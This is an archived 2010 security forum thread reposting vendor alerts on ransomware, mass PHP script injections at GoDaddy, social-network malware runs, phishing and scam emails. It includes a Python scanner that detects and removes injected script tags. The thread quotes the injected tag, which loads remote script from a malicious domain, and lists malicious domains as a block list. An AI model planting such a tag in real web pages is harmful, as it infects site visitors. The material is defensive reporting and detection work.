SPAM frauds, fakes, and other MALWARE deliveries - archive

Windows “activation” ransomware

FYI...

Windows “activation” ransomware
- http://sunbeltblog.blogspot.com/2010/05/windows-activation-ransomware.html
May 17, 2010 - "... a piece of ransomware that locks up Windows until you enter your credit card data. First it claims you are running a pirated version of Windows and they need your billing details. “... but your credit card will NOT be charged”... Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate. Basically, the Trojan locks your system. The only thing you can do is complete the "activation". You can choose to "activate windows" or "do it later". If you choose to do it later, your machine reboots... Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it..."

(Screenshots available at the URL above.)

:mad:
 
GoDaddy attacks continue...

FYI... 'suggest BLOCK THEM ALL...

- http://community.websense.com/blogs...ess-blog-got-injected-_2D00_-again_2100_.aspx
19 May 2010 - "... The domain kdjkfjskdfjlskdjf .com is directly related to the ongoing attacks and still appears on injected sites. Another set of domains is losotrana .com, holasionweb .com, indesignstudioinfo .com and zettapetta .com. Checking the number of hits... over this past weekend revealed more than 23,000 infected pages with this kind of attack, and it's still growing. The malicious code is injected by the attackers into PHP files on the server..."
(More detail at the Websense URL above.)

- http://www.malwaredomains.com/wordpress/?p=972
May 18, 2010 - Please block losotrana . com ASAP. Source...

GoDaddy attacks continue...
- http://blog.sucuri.net/2010/05/continuing-attacks-at-godaddy.html
May 17, 2010 - "And it is still not over. Remember the code we found last week* that was hacking all the PHP files at GoDaddy? It is still happening, but now using the losotrana .com domain ( http: //losotrana .com/js.php ). This is the script that will show up on your site if you get hacked:
<script src="http: //losotrana .com/js.php"></script>
Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:
http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html
You can clean up using this script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
All the sites so far hosted at GoDaddy... GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet... this Losotrana .com site is hosted at the same domain as holasionweb .com used on the previous attack..."
* http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html
May 12, 2010
___

- http://google.com/safebrowsing/diagnostic?site=kdjkfjskdfjlskdjf.com/
"... last time Google visited this site was on 2010-05-15, and the last time suspicious content was found on this site was on 2010-05-15. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=losotrana.com/
"... last time Google visited this site was on 2010-05-17, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 6 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=holasionweb.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-17. Malicious software includes 108 scripting exploit(s), 1 trojan(s)..."

- http://google.com/safebrowsing/diagnostic?site=indesignstudioinfo.com/
"... last time Google visited this site was on 2010-05-18, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 11 scripting exploit(s)..."

- http://google.com/safebrowsing/diagnostic?site=zettapetta.com/
"... The last time Google visited this site was on 2010-05-14, and the last time suspicious content was found on this site was on 2010-05-14. Malicious software includes 2 scripting exploit(s)..."

:fear::mad:
 
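The Sucuri and Websense posts above describe the injection as a single `<script src=...>` tag pointing at one of a handful of domains being written into PHP files on the compromised hosts. The scanner below is an added example (not code from Sucuri, Websense or this thread) that walks a web root, flags any script tag whose host is one of the domains the posts name (written here without the defanging spaces used in the forum quotes), and optionally strips the whole `<script ...></script>` element so the file can be reviewed and restored; the sample PHP file is constructed for the demonstration.

```python
"""Detect and strip injected <script src="http://<bad-domain>/..."> tags in web files."""
import re
from pathlib import Path

# Domains named in the Websense, Sucuri and ScanSafe posts on the May 2010 GoDaddy injections.
KNOWN_BAD_DOMAINS = {
    "losotrana.com",
    "holasionweb.com",
    "kdjkfjskdfjlskdjf.com",
    "indesignstudioinfo.com",
    "zettapetta.com",
}

# Captures the host part of a script src; case-insensitive, tolerates unquoted or
# protocol-relative src values, and stops the host at a port, path, query or fragment.
SCRIPT_SRC_RE = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*['"]?\s*(?:https?:)?//([^/'"\s>?#:]+)""",
    re.IGNORECASE,
)
# Same prefix, extended to the closing </script> so the whole element can be removed.
SCRIPT_TAG_RE = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*['"]?\s*(?:https?:)?//([^/'"\s>?#:]+)[^>]*>\s*</script\s*>""",
    re.IGNORECASE | re.DOTALL,
)


def is_bad_host(host, bad_domains=KNOWN_BAD_DOMAINS):
    """True if host is one of the listed domains or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in bad_domains)


def find_injected_scripts(text, bad_domains=KNOWN_BAD_DOMAINS):
    """Return [(line_number, host), ...] for script tags loading from a listed domain."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in SCRIPT_SRC_RE.finditer(line):
            if is_bad_host(m.group(1), bad_domains):
                hits.append((lineno, m.group(1).lower()))
    return hits


def remove_injected_scripts(text, bad_domains=KNOWN_BAD_DOMAINS):
    """Return (cleaned_text, removed_count); legitimate script tags are left untouched."""
    removed = 0

    def repl(m):
        nonlocal removed
        if is_bad_host(m.group(1), bad_domains):
            removed += 1
            return ""
        return m.group(0)

    return SCRIPT_TAG_RE.sub(repl, text), removed


def scan_tree(root, extensions=(".php", ".html", ".htm", ".js")):
    """Walk root and map each affected file path to its list of hits (read-only)."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in extensions:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            hits = find_injected_scripts(text)
            if hits:
                findings[str(path)] = hits
    return findings


# Constructed sample: an ordinary PHP page with one legitimate script tag and the
# injected tag quoted in the Sucuri post appended after the closing ?>.
SAMPLE_PHP = """<?php
// constructed sample page
echo "hello";
?>
<script src="https://example.com/app.js"></script>
<script src="http://losotrana.com/js.php"></script>
"""

if __name__ == "__main__":
    import sys
    print(find_injected_scripts(SAMPLE_PHP))
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            print(path, hits)
```

Run with a web root as the first argument to list affected files; apply `remove_injected_scripts` to each file only after taking a copy, since it rewrites content.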
Twitter attack - in progress...

FYI...

Twitter attack - in progress...
- http://www.f-secure.com/weblog/archives/00001954.html
May 20, 2010 11:37 GMT - "... another malware run underway on Twitter. A fairly large pool of fake accounts are sending out messages with popular hashtags and the text "haha this is the funniest video ive ever seen"... People see these messages when they look for trending topics in Twitter. The shortlinks in the Tweets point to a page under pc-tv .tv, which uses a Java exploit to drop a keylogger / banking trojan combo to your system..."

:mad:
 
AutoRun worms still alive

FYI...

AutoRun worms still alive...
- http://blog.trendmicro.com/new-autorun-worms-utilize-action-key/
May 18, 2010 - " ... malware proponents continue to find new techniques to proliferate their malicious creations despite workarounds that users employ to prevent them from automatically running on their systems... simply disabling AutoPlay just does not cut it anymore. Extra steps such as monitoring where external devices are used and updating all security software to combat potential threats should also be taken. For business users, security policies regarding data access and the use of external devices should be employed and enforced across the organization. Additional information about malware-protecting removable devices can be found in 'How to Maximize the Malware Protection of Your Removable Drives'*".
* http://blog.trendmicro.com/how-to-maximize-the-malware-protection-of-your-removable-drives/

:fear::fear:
 
FIFA fans - Scam targets

FYI...

FIFA fans - Scam targets
- http://blog.trendmicro.com/latest-online-scam-targets-fifa-fans/
May 26, 2010 - "The upcoming “2010 FIFA World Cup” in South Africa is one of the most highly anticipated events in sports history today... two separate SPAM runs leveraging the said event. The first spam sample had a .DOC file attachment that informs recipients of a supposed new contest called “Final Draw” organized in part by the FIFA Organizing Committee. It also tells the recipient of a US$550,000 prize. To claim this, however, the “winner” must immediately coordinate with the releasing agent via the contact information indicated in the email. The email also asks the recipient to give out personal information... This asks recipients to divulge specific information in relation to a fund transfer transaction amounting to a whopping US$10.5 million. Upon agreeing to the proposal, the recipient should supposedly get 30 percent of the said amount. Note that this tactic is reminiscent of the infamous 419 or Nigerian scam, which persuaded users to send cash by promising them a large amount of money in return for their cooperation... In fact, FIFA sternly warned fans of similar online scams*..."
* http://www.pcworld.com/article/197056/FIFA_Tickets.html

- http://www.symantec.com/connect/blogs/2010-fifa-world-cup-spammers-raise-their-game
May 27, 2010

- http://www.f-secure.com/weblog/archives/00001964.html
June 9, 2010

:mad:
 
44 million stolen gaming credentials uncovered

FYI...

44 million stolen gaming credentials uncovered
- http://www.symantec.com/connect/blogs/44-million-stolen-gaming-credentials-uncovered
May 26, 2010 - "... We recently analyzed a new sample submitted to Symantec and came across a server hosting the credentials of 44 million stolen gaming accounts. What was interesting about this threat wasn’t just the sheer number of stolen accounts, but that the accounts were being validated by a Trojan distributed to compromised computers. Symantec detects this threat as Trojan.Loginck*. This particular database server we uncovered seems very much to be the heart of the operation—part of a distributed password checker aimed at Chinese gaming websites. The stolen login credentials are not just from particular online games, but also include user login accounts associated with sites that host a variety of online games. In both cases the accounts contained in the database have been obtained from other sources, most likely using malware with information-stealing capabilities, such as Infostealer.Gampass **. So, picture this: you are a bad guy and have created or purchased a botnet. You have targeted online gaming websites and now have 44 million sets of gaming credentials at your disposal... The database in question currently holds approximately 17GB of flat file data. The particular sample we analysed attempted to validate passwords for Wayi Entertainment, but there are credentials for at least 18 gaming websites in the database... if you are in possession of a gaming account from one of the websites listed above, an update of your password would not go amiss..."

* http://www.symantec.com/business/security_response/writeup.jsp?docid=2010-052013-2257-99

** http://www.symantec.com/security_response/writeup.jsp?docid=2006-111201-3853-99

:fear:
 
Credit union fraud via phish for U.S. Servicemen and Vets

FYI...

Credit union fraud via phish for U.S. Servicemen and Vets
- http://www.symantec.com/connect/blogs/online-fraudsters-catch-us-servicemen-and-veterans-guard
May 25, 2010 - "... a phishing site was observed to be spoofing a credit union that provides financial services to members of the U.S. Defense Department and their family members. The defense forces covered by the credit union include the Army, Marine Corps, Navy, and Air Force. The services are provided to their customers even after they retire from the armed forces or join some other organization. Further, those who have joined the credit union can have the membership services extend to their family members. The brand has now grown to serve millions of customers across the U.S. The phishing site states that the customer’s login has been locked because of several failed login attempts. The page further states that the customer needs to fill in a form with certain sensitive information to unlock the login. The sensitive information includes social security number, credit card details, date of birth, mother’s maiden name, and details of the account’s joint owner. The page also includes a fake CAPTCHA that accepts data irrespective of the number entered. When the sensitive information is entered, the phishing site states that the customer’s password is unlocked for logging in. The page is then redirected to the legitimate site... The phishing site was hosted on an IP-based domain (IP-based URLs look like this - http ://255.255.255.255/) based on servers in Taiwan. Variants of the phishing URL have been utilized to spoof other brands as well. Internet users are advised to follow best practices to avoid phishing attacks. Here are some basic tips for avoiding online scams:
• Do not click on suspicious links in email messages.
• Check the URL of the website and make sure that it belongs to the brand.
• Type the domain name of your brand’s website directly into your browser’s address bar rather than following any link.
• Frequently update your security software..."

:fear:
 
boingboing .com spews drive-by-download malware...

FYI...

boingboing .com spews malware...
- http://news.cnet.com/8301-27080_3-20005969-245.html
May 26, 2010 - "... Armorize scanned the Alexa top-ranked 200,000 Web sites and found that 1 percent were infected with malware that can be used in drive-by downloads. One site Armorize found to be used as a vehicle for delivering malware was boingboing .com, which attackers were likely using in the hopes of reaching a broad audience by taking advantage of the proximity of the domain to the popular blog at Boingboing.net..."
* http://blog.armorize.com/2010/05/beware-of-boingboingcom-malware.html

:fear::mad:
 
Facebook attacked again...

FYI...

Facebook attacked again...
- http://community.websense.com/blogs.../most-hilarious-video-attack-on-facebook.aspx
28 May 2010 09:11 PM - "... For the third weekend in a row users on Facebook are bombarded with messages on their walls talking about Distracting Beach Babes, Sexiest Video Ever or this latest attack which supposedly is the "Most Hilarious Video ever"... This attack is different from previous weekends as not only do the attackers try to steal your Facebook credentials, what happens after that depends on which country you connect from. Once you click on the link to view the video you are taken to a fake Facebook login page where you are tricked into entering your credentials. The login page looks like the real thing except of course if you look at the address bar you can see that you're not on facebook.com. But users can easily be tricked into thinking that they temporarily were logged out of Facebook and to continue they have to login..."
(Screenshots available at the URL above.)

- http://blog.webroot.com/2010/05/28/facebook-spam-leads-to-viagra-vendor-drive-by-download/
May 28, 2010

- http://www.sophos.com/blogs/gc/g/2010/05/31/viral-clickjacking-like-worm-hits-facebook-users/
May 31, 2010 - "Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook..."

:fear::mad:
 
Top Web Malware in May...

FYI...

... Top Web Malware in May
- http://blog.scansafe.com/journal/2010/6/1/godaddy-attacks-top-web-malware-in-may.html
June 1, 2010 - "Some interesting stats from May.
• 16196 unique malicious domains.
• The top ten malicious domains comprised 23% of all Web malware attacks in May 2010.
• Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010.
• Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites.
• Gumblar was the second most prevalent Web malware encountered, at 7%.
• Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%.
Top Ten Malicious Domains, May 2010
holasionweb .com* - 7%
www .sitepalace .com - 3%
losotrana .com* - 2%
indesignstudioinfo .com* - 2%
kdjkfjskdfjlskdjf .com* - 2%
easfindnex .org - 2%
findermar .org - 2%
76.73.33.109 - 2%
findrasup .org - 1%
zettapetta .com* - 1%
*Related to attacks against GoDaddy-hosted websites
Top Ten Web Malware, May 2010
Trojan.JS.Redirector.cq - 14%
Exploit.JS.Gumblar - 7%
Backdoor.Win32.Alureon - 6%
Exploit.Java.CVE-2009-3867.d - 3%
Trojan.JS.Redirector.at - 3%
Downloader.JS.Agent.fhx - 2%
OI.Backdoor.Win32.Autorun.cx - 2%
OI.Win32.Susp.ms - 2%
Trojan.Iframe.f - 2%
Trojan.GIFIframe.a - 2% "

:fear::fear:
 
Samsung Wave - infected microSD card

FYI...

Samsung Wave - infected microSD card
- http://www.engadget.com/2010/06/02/samsung-wave-shipping-with-infected-microsd-card/
June 2, 2010 - "Did you get a Samsung Wave today, or perhaps early last week? You might not want to connect it to your computer, just in case. We're hearing anecdotal reports that the 1GB microSD card shipped with certain German units includes a nasty surprise: it automatically installs the trojan Win32/Heur using the file "slmvsrv.exe"...
Update: Samsung HQ got in touch with MobileBurn to confirm the existence of the virus in shipping S8500 Wave handsets, but said that the outbreak was confined to the German market's initial production run and all other shipments are A-OK. Still, there's no harm in disabling autorun before connecting one to your PC, eh?"

:bomb:
 
FBI Spam ? ...

FYI...

FBI Spam ? ...
419 Scam Resurfaces with FBI SPAM
- http://blog.trendmicro.com/spammers-pose-as-fbi-to-send-out-scam-mail/
June 3, 2010 - "Cybercriminals have found yet another way to grab users’ attention. This time, they posed as members of the Federal Bureau of Investigation (FBI) from Washington D.C. to scam users with a spammed message... As in any other scam, the email sender posed as someone from a legitimate body in this attack. The sender claims to be from the FBI. The spam, meanwhile, informs the recipient that he/she is the beneficiary of US$10.5 million. The fake FBI representative then gives the recipient instructions to contact the head of the “Online Transfer Department” of the United Trust Bank London. The said head, urges the email, is the only person who can take responsibility for giving out the promised millions. It even advises the email recipient to strictly follow the instructions in order to make the claim. This, of course, is a hoax. For greater irony and to prove that cybercriminals will go for desperate measures to trick their victims, a note has even been added at the end. This informs the recipient of possible fraudsters who might attempt to deal with him/her. To avoid becoming a victim of such a scam, always pay attention to every detail in email messages you receive. One can easily distinguish what is real and what is fake via careful observation. All you need to do is to carefully observe..."

(Screenshot available at the URL above.)

:fear::fear:
 
Twitter malicious SPAM - password reset...

FYI...

Twitter malicious SPAM - password reset...
- http://community.websense.com/blogs...0/06/03/reset-your-twitter-password-spam.aspx
03 Jun 2010 07:18 PM - "Websense... has detected a spam posing as a Twitter Password Reset Notification. We have seen about 55,000 instances of this malicious spam email so far... The spam contains a link to a compromised Web site that, when clicked or pasted into the browser, prompts the user to download a malicious executable named password.exe. The executable turns out to be a rogue AV called Protection Center Safebrowser. What distinguishes this rogue AV from the others is that it actually displays on the user's desktop some of the malicious files it installs. This makes the attack notification more believable. The attack is detected as Trojan.Generic.Win32 (SHA:0b00649c14b96219dd080a0ce6492c4d04c7f45c) and is currently recognized by 19 of the 41 engines on Virus Total*..."
* http://www.virustotal.com/analisis/...eea78ba8a7fa2dd411e7a349d8381e9332-1275590333
File 204bec9018693bba6200c0280cf4366e9 received on 2010.06.03 18:38:53 (UTC)
Result: 19/41 (46.34%)

(Screenshots available at the Websense URL above.)

:mad::fear:
 
SPAM campaigns send millions...

FYI...

SPAM campaigns send millions of emails
- http://community.websense.com/blogs.../2010/06/07/spam-summary-of-last-weekend.aspx
7 Jun 2010 - "Websense... detected 3 spam campaigns with millions of emails...
• Confirm Twitter password, and Twitter security model setup ...
• Facebook account deactivated, or invited by somebody famous ...
• Outlook Setup Notification ...

The statistics... show that spam increased by 15,700 daily on average during the weekend, compared to work days..."

(Screenshots available at the URL above.)

:fear::fear::fear:
 
ZeuS SPAM attack spoofs IRS, Twitter, Youtube

FYI...

ZeuS SPAM attack spoofs IRS, Twitter, Youtube
- http://krebsonsecurity.com/2010/06/zeus-trojan-attack-spoofs-irs-twitter-youtube/
June 9, 2010 - "Criminals have launched a major e-mail campaign to deploy the infamous ZeuS Trojan, blasting out spam messages variously disguised as fraud alerts from the Internal Revenue Service, Twitter account hijack warnings, and salacious Youtube.com videos. According to Gary Warner, director of research in computer forensics at the University of Alabama, Birmingham, this latest attack* appears to be an extension of a broad malware spam campaign that began at the end of May. The fake IRS e-mails arrive with the tried-and-true subject line “Notice of Underreported Income,” and encourage the recipient to click a link to review their tax statement. All of the latest e-mails use a variety of URL shortening services... Warner said anti-virus detection for this malware is extremely low: Only three out of 40 different anti-virus products detected the file as malicious**, yet none of those currently identify it for what it is: Another new version of the ZeuS Trojan. These broad attacks usually are quite successful, and in the past they have been used to great effect by the same criminal gangs that have been stealing tens of millions of dollars from small to mid-sized businesses..."
* http://garwarner.blogspot.com/2010/06/irs-malware-notice-of-underreported.html
June 08, 2010

** http://www.virustotal.com/analisis/...58f274b3bc3b9edfaf96dcbaeb619cdc96-1276042845
File 1276042605.tax-statement.exe received on 2010.06.09 00:20:45 (UTC)
Result: 3/40 (7.50%)

:fear::mad:
 
SCAMS - Gulf oil spill ...

FYI...

SCAMS - Gulf oil spill ...
- http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt058.shtm
06/09/2010 - "... The Federal Trade Commission... cautions consumers and businesses to be on the alert for fraudulent activity related to the explosion aboard the Deepwater Horizon drilling rig and the resulting spill – and to report their experiences to federal and state authorities. British Petroleum (BP) leased the rig, which was owned and operated by Transocean. The FTC says it’s likely that scammers will use e-mails, websites, door-to-door collections, flyers, mailings and telephone calls to make contact and solicit money. Some may claim they’re raising money for environmental causes or offer fraudulent services – like remediation services – related to the oil spill. Others may claim they can expedite loss claims for a fee. Still others may knock on your door and talk about placing booms or checking for oil on your property. Chances are they’re trying to gain your trust to get inside your home or get access to your personal information. The FTC says that at the very least, you will want to do some homework before making a donation or entering into an agreement for services..."
- http://www.ftc.gov/charityfraud/

(More detail at -both- FTC URLs above.)

Also see:
- http://www.avertlabs.com/research/b.../peering-into-the-affiliate-marketing-window/

- http://www.infosecurity-us.com/blog/2010/6/7/135-000-fake-youtube-pages-delivering-malware/168.aspx
June 7, 2010 - "... Attempting to play the video on these fake pages prompts the user to install a ‘media codec’ which then infects the machine with malware... fake YouTube pages are well crafted and look almost identical to the real site. By using websites like YouTube, cyber criminals are taking advantage of a users’ inherent trust in the site and are able to infect more machines. Each page claims to have a “Hot Video” associated with anything from the Gulf Oil Spill to the NBA Playoffs. Google search results show 135,000 of these infected pages at the time of writing..."

:fear::mad::fear:
 
More World Cup scams, SPAM, etc...

FYI...

More World Cup scams, SPAM, etc...

- http://sunbeltblog.blogspot.com/2010/06/world-cup-visa-phishers-come-off-bench.html
June 14, 2010

- http://www.symantec.com/connect/blogs/fifa-world-cup-watch-all-matches-free-adult-video-site
June 13, 2010

- http://www.sophos.com/blogs/sophoslabs/?p=10015
June 11, 2010

- http://www.symantec.com/connect/blogs/2010-fifa-world-cup-and-cybercrime-end-user-survey
June 10, 2010 - "... best practices:
• Don’t open unsolicited e-mails or social media messages purporting to contain special offers or extraordinary deals related to the World Cup, and especially don’t click on any links in such messages.
• If an online offer appears to be too good to be true, it probably is. Scammers often try to make their bogus offers sound so great that they would be nearly impossible to pass up…if they were real that is.
• Be careful about what “official” social networking accounts you follow, such as those that appear to be created by World Cup teams or players. Often, cybercriminals will create accounts posing to be someone they’re not.
• When searching for online video of the World Cup, avoid sites you’ve never heard of before and if you’re told you must update your media player before viewing a video, be very cautious as this might be a ploy by attackers to get you to download malware..."

- http://pandalabs.pandasecurity.com/extreme-sports-2010-fifa-world-cup-bhseo-attack/
06/9/10

:fear::fear:
 
Twitter - PDF exploit SPAM run... in progress

FYI...

Twitter - PDF exploit SPAM run... in progress
- http://sunbeltblog.blogspot.com/2010/06/pdf-exploit-spamrun-on-twitter.html
June 15, 2010 - "There appears to be a bit of a mad dash to infect people by the boatload on Twitter, with a variety of different messages being sent to random targets... account endlessly says “Wow, a marvelous product”. Click the link, and you might be redirected to some sort of paid movie service... If you’re unlucky, however, you’ll end up at a URL such as fqsmydkvsffz(dot)com/tre/vena(dot)html, where PDF exploits await... phrases used for this spamrun include:
Wow, An incredible Product
Wow, A shocking Discovery
Watch This
I Just Cant Beleive This
Wow, A stunning Product
Wow, A Revolutionary Product
Wow, A fascinating Site

This isn't the first malicious spamrun on Twitter, and it certainly won't be the last. With that in mind, it might be best to avoid random links sent to you from strangers. You never quite know what’s at the other end."

:fear::fear:
 
.gov site hosts Phish - UK banks

FYI...

.gov site hosts Phish - UK banks
- http://sunbeltblog.blogspot.com/2010/06/gov-website-plays-host-to-uk-banking.html
June 16, 2010 - "... something rather nasty on the Central Department .gov portal which can be found at central(dot)gov(dot)py... fourteen different banking / financial services phishes including Barclays, Abbey, Northern Rock, Halifax and Lloyds TSB. Clearly, someone is desperate to get their hands on as many UK banking credentials as possible. These phishes are all online at the moment although some appear to be flagged in browsers such as Firefox. We’ve contacted the hosts and hopefully all of the above will be offline shortly."

(Screenshots available at the Sunbelt blog URL above.)

:fear::mad:
 